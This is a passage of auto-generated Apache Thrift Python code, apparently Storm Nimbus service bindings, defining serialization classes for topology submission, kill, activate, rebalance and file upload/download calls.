TType.STRING, 'jsonConf', None, None, ), # 3 (4, TType.STRUCT, 'topology', (StormTopology, StormTopology.thrift_spec), None, ), # 4 (5, TType.STRUCT, 'options', (SubmitOptions, SubmitOptions.thrift_spec), None, ), # 5 ) def __init__(self, name=None, uploadedJarLocation=None, jsonConf=None, topology=None, options=None,): self.name = name self.uploadedJarLocation = uploadedJarLocation self.jsonConf = jsonConf self.topology = topology self.options = options def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.uploadedJarLocation = iprot.readString(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.jsonConf = iprot.readString(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.topology = StormTopology() self.topology.read(iprot) else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.options = SubmitOptions() self.options.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('submitTopologyWithOpts_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() if self.uploadedJarLocation is not None: oprot.writeFieldBegin('uploadedJarLocation', TType.STRING, 2) oprot.writeString(self.uploadedJarLocation) oprot.writeFieldEnd() if self.jsonConf is not None: oprot.writeFieldBegin('jsonConf', TType.STRING, 3) oprot.writeString(self.jsonConf) oprot.writeFieldEnd() if self.topology is not None: oprot.writeFieldBegin('topology', TType.STRUCT, 4) self.topology.write(oprot) oprot.writeFieldEnd() if self.options is not None: oprot.writeFieldBegin('options', TType.STRUCT, 5) self.options.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class submitTopologyWithOpts_result: """ Attributes: - e - ite """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (AlreadyAliveException, AlreadyAliveException.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2 ) def __init__(self, e=None, ite=None,): self.e = e self.ite = ite def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = AlreadyAliveException() self.e.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.ite = InvalidTopologyException() self.ite.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('submitTopologyWithOpts_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() if self.ite is not None: oprot.writeFieldBegin('ite', TType.STRUCT, 2) self.ite.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class killTopology_args: """ Attributes: - name """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 ) def __init__(self, name=None,): self.name = name def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('killTopology_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class killTopology_result: """ Attributes: - e """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, e=None,): self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('killTopology_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class killTopologyWithOpts_args: """ Attributes: - name - options """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 (2, TType.STRUCT, 'options', (KillOptions, KillOptions.thrift_spec), None, ), # 2 ) def __init__(self, name=None, options=None,): self.name = name self.options = options def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.options = KillOptions() self.options.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('killTopologyWithOpts_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() if self.options is not None: oprot.writeFieldBegin('options', TType.STRUCT, 2) self.options.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class killTopologyWithOpts_result: """ Attributes: - e """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, e=None,): self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('killTopologyWithOpts_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class activate_args: """ Attributes: - name """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 ) def __init__(self, name=None,): self.name = name def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('activate_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class activate_result: """ Attributes: - e """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, e=None,): self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('activate_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deactivate_args: """ Attributes: - name """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 ) def __init__(self, name=None,): self.name = name def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deactivate_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deactivate_result: """ Attributes: - e """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, e=None,): self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deactivate_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class rebalance_args: """ Attributes: - name - options """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 (2, TType.STRUCT, 'options', (RebalanceOptions, RebalanceOptions.thrift_spec), None, ), # 2 ) def __init__(self, name=None, options=None,): self.name = name self.options = options def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.options = RebalanceOptions() self.options.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('rebalance_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() if self.options is not None: oprot.writeFieldBegin('options', TType.STRUCT, 2) self.options.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class rebalance_result: """ Attributes: - e - ite """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2 ) def __init__(self, e=None, ite=None,): self.e = e self.ite = ite def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.ite = InvalidTopologyException() self.ite.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('rebalance_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() if self.ite is not None: oprot.writeFieldBegin('ite', TType.STRUCT, 2) self.ite.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class beginFileUpload_args: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('beginFileUpload_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class beginFileUpload_result: """ Attributes: - success """ thrift_spec = ( (0, TType.STRING, 'success', None, None, ), # 0 ) def __init__(self, success=None,): self.success = success def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRING: self.success = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('beginFileUpload_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRING, 0) oprot.writeString(self.success) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class uploadChunk_args: """ Attributes: - location - chunk """ thrift_spec = ( None, # 0 (1, TType.STRING, 'location', None, None, ), # 1 (2, TType.STRING, 'chunk', None, None, ), # 2 ) def __init__(self, location=None, chunk=None,): self.location = location self.chunk = chunk def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.location = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.chunk = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('uploadChunk_args') if self.location is not None: oprot.writeFieldBegin('location', TType.STRING, 1) oprot.writeString(self.location) oprot.writeFieldEnd() if self.chunk is not None: oprot.writeFieldBegin('chunk', TType.STRING, 2) oprot.writeString(self.chunk) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class uploadChunk_result: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('uploadChunk_result') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class finishFileUpload_args: """ Attributes: - location """ thrift_spec = ( None, # 0 (1, TType.STRING, 'location', None, None, ), # 1 ) def __init__(self, location=None,): self.location = location def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.location = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('finishFileUpload_args') if self.location is not None: oprot.writeFieldBegin('location', TType.STRING, 1) oprot.writeString(self.location) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class finishFileUpload_result: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('finishFileUpload_result') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class beginFileDownload_args: """ Attributes: - file """ thrift_spec = ( None, # 0 (1, TType.STRING, 'file', None, None, ), # 1 ) def __init__(self, file=None,): self.file = file def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.file = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('beginFileDownload_args') if self.file is not None: oprot.writeFieldBegin('file', TType.STRING, 1) oprot.writeString(self.file) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class beginFileDownload_result: """ Attributes: - success """ thrift_spec = ( (0, TType.STRING, 'success', None, None, ), # 0 ) def __init__(self, success=None,): self.success = success def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRING: self.success = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('beginFileDownload_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRING, 0) oprot.writeString(self.success) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class downloadChunk_args: """ Attributes: - id """ thrift_spec = ( None, # 0 (1, TType.STRING, 'id', None, None, ), # 1 ) def __init__(self, id=None,): self.id = id def 